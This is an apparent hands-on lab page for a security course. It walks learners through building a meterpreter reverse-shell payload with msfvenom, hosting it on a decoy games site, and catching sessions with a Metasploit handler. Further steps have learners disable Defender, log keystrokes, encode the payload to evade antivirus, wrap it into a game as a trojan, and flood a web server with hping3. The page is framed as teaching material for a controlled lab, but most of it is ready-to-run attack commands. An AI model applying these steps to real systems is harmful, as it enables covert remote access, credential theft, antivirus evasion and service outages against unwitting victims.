Samer Aoudi
Basic Malware Analysis

In this practical activity, you will use create, distribute, and analyze malware.

Prerequisite Knowledge: Basic security knowledge
Requirements: Kali + Windows Target (Lab Environment Setup)
Duration: 60+min
Files: games.rar
Related Videos:
Metasploit The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. The Metasploit framework available in Kali Linux is a penetration testing software for offensive security teams.
Msfvenom Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.

Our malware has a Reverse Shell payload. When a malware is wrapped with another useful program, like a game, we basically create a Remote Access Trojan, or RAT. Our malware allows the hacker to gain remote access to the victim’s computer. This lab follows these steps
Step 1: Create the malware using msfvenom
In this step, you are creating an executable file with the malicious payload.
Step 2: Distribute the malware using a website
In this step, you will upload your malware file into a web server where unsuspecting victims can download it.
Step 3: Start a handler that listens to incoming connections
In this step, you sit and wait until victims click the malicious links on your website.
Step 4: Hack away…
In this step, you can do whatever you want.

In this activity, you will create and distribute malware in a controlled environment.

Expert Mode
  1. Download the games.rar file and extract its content
  2. Start the Apache web server on Kali
  3. Copy the games website into the web server's /html folder
  4. Test the server and the games site
  5. Create a reverse TCP payload using msfvenom
  6. Upload the payload output file (malware) to the website
  7. Create a listener using metasploit
  8. Download and run the malware from your target machine
  9. Experiment with the meterpreter options
Regular Mode
Task in details »
The Hacker's Website
  1. Start Kali
  2. Download the games.rar file and extract its content
  3. In Kali, start the Apache web server using the following command: sudo apache2ctl start
    An alternative command to run the Apache server if you're using Kali 2024: sudo service apache2 start
  4. Navigate to the var/www/html folder and open it as Root
  5. Copy the newly extracted games folder inside the var/www/html folder in Kali
  6. Once copied, right-click the games folder and go to Properties for the Others group to Read and Write
  7. Do the same for the index.html file inside the games folder
  8. Test the website from your Windows by using the IP address of your Kali in Internet Explorer. Example:
  9. Navigate to the games folder by typing /games after the IP address in the browser to test the Games Hub webpage. Example:
The Malware
  1. Using MSFVENOM, create the payload and save it in a file called angry_birds.exe by typing the following code:
    msfvenom -p windows/meterpreter/reverse_tcp lhost=<Kali's IP Address> lport=443 -f exe -o angry_birds.exe
    It goes without saying that you should use your Kali's IP address without the <>
    The above is a general pyaload; if we want to target 64-bit architecture, use the below:
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali's IP Address> lport=443 -f exe -o angry_birds.exe -a x64

  2. The output file (angry_birds.exe) will be in your Kali folder. Copy it into the games web folder
The Listener/Handler
  1. We will use the Metasploit framework to create a handler the will listen to incoming connections from infected computers. Start Metasploit and follow the steps shown below:
    msf6 > use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    If you used the 64-bit architecture in msfvenom, use the payload below:
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost
    set lport 443
  2. The output of the steps above is a running reverse TCP handler. Confirm that it started and is listening on your Kali port 443
  3. Go to you Windows Internet Explorer, refresh, and click the Angry Birds link
  4. Click the Run option and confirm despite the warning
    Windows Defender will most likely block this file. To prevent Defender from blocking the malware:
    • Open Windows Defender
    • Click Settings
    • Turn off Real-Time Protection
  5. Go back to your Metasploit listener and notice the new Meterpreter session
Meterpreter: General
  1. Use the help command in meterpreter to learn about the options available for you. Here are some useful options
    screenshot Take a screenshot of your hacked target
    screenshare Open a live view of your hacked target
    sysinfo Get information about the remote system, such as OS
    shell Open a system command shell of the hacked target and run any Windows command you want
Meterpreter: Keylogger
  1. A keylogger records the keystrokes on the victim's machine. Run the following commands:
    ps List running processes on the target using the ps command and note down the process ID (PID) of explorer.exe
    migrate 1884 Migrate to the explorer process (note: use the PID you discovered; not the one in the example)
    getpid Ensure the migration is done
    keyscan_start Start a keylogger on the hacked target
  2. Go to your Windows and do something that requires typing (e.g. type in a text document)
  3. Go back to Kali and get the keystrokes using the following command keyscan_dump
Malware Analysis is the study of the functionality, origin and potential impact of a given malware. In other words, it is an investigation of the risks, intentions, and functionality of malware. There are mainly two types categorized by analysis method:
  1. Static Analysis
  2. Dynamic Analysis
One way to evade detection by AV software is to encode the malware. MSFVENOM has built-in encoding capabilities with many encoders readily available.

In this activity, you will encode the malware in an attempt to evade detection. You will also perform static malware analysis to determine the best performing malware.

Expert Mode
  1. Create another version of the malware (angry_birds_v2.exe ) but this time encode it with the x86/shikata_ga_nai encoder
  2. Create different encoded versions, each with a different number of encoding iterations
  3. Create different encoded versions, each with a different encoder
  4. Perform static malware analysis on the different files using Virus Total website »
  5. Which version evaded detection the best?
Regular Mode
Task in details »
Evasion Attempt
  1. Use the following command to list available encoders msfvenom –l encoders
  2. Create a new malware file called angry_birds_v2.exe as we did in Task 1 but this time using an encoder
    msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=443 -e x86/shikata_ga_nai -f exe -o angry_birds_v2.exe
    We used the -e option (encoder) and the name of the encoder: x86/shikata_ga_nai
    Notice that only one encoding iteration was performed
  3. Let’s create version 3 (angry_birds_v3.exe) using 20 iterations
    msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=443 -e x86/shikata_ga_nai –i 20 -f exe -o angry_birds_v3.exe
    We used the -i option (# of iterations)
  4. Repeat the above to create angry_birds_v4.exeusing the cmd/powershell_base64 encoder
  5. Repeat the above to create angry_birds_v5.exeusing the cmd/powershell_base64 encoder with 10 iterations
    You should not have 5 malware files in your Kali folder
Malware Analysis
  1. Visit the Virus Total » website and upload the first version of your RAT (angry_birds.exe)
  2. Note down how many AV detected the malware
  3. Repeat for all versions and note down your findings (you will need the numbers in the questions section)
  4. Let us search for malware using their hash signature. On the Virus Total website, go to Search and look for the following signatures
    Signature 1:
    Signature 2:
    Signature 3:
  5. For each signature, write down the malware name and/or type and how many AV software flagged it (you will need this information to answer some questions later)
If we wrap our malware with another usable software, like a game, then we have a Trojan. Since our malware allows us to remotely connect to the target machine, it can be classified as a RAT. MSFVENOM has two options that allow us to do this:


Specify a custom executable file to use as a template


Preserve the --template behavior and inject the payload as a new thread

In this activity, you will convert our malware into a Trojan.

Expert Mode
  1. Your mission, should you choose to accept it, is to convert our malware intro a Trojan
Regular Mode
Task in details »
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=443 -e x86/shikata_ga_nai -f exe -x ~/MissionDarkSnake/MissionDarkSnakeEvolved.exe -k -o MissionDarkSnakeEvolved.exe

In order to complete this task, you will need a useful program (e.g., a game). The games web folder has two games you can use Mine Sweeper and Dark Snakes. Choose one for this task

  1. Using the sample code above as a reference, convert our malware intro a Trojan. You will need the -x and -k options
  2. Deploy and test
hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. HPING3 can be used to flood port 80 (HTTP service port) on the target by sending a very large number of packets.

In this activity, you will perform a DoS attack from and render a service unavailable on the target.

Expert Mode
  1. Using HPING3, perform a DoS attack on the HTTP service running on the Windows 10 target
Regular Mode
Task in details »
  1. Start Kali and the Windows 10 target
  2. Get the IP address of the target using NMAP: nmap -sn <Your Network IP>
  3. Find out what services are running on the target: nmap <Target IP>

  4. WAMP
  5. Open the Web browser in Kali and type in the IP address of your target. You should be able to see a website (see below)

  6. WAMP
  7. Using HPING3, perform a DoS attack on the Windows 10 web server
    hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source <Windows 10 IP address>
    hping in flood mode, no replies will be shown
  8. While HPING3 is running, go back to the web browser and click few of the links on it (give it few seconds for the flood to kick in).
    Basically, the server will be too busy and the webpages will take too ling to respond.
  9. When done, click Ctrl-C to stop the flood
Red fields are required.
Reverse Shell
Distribute the malware using a website
Create the executable file with the malicious payload
Start a handler
Inside var/www/html
Inside Kali root
On the Windows target
Malware Analysis
Malware Total
Virus Total

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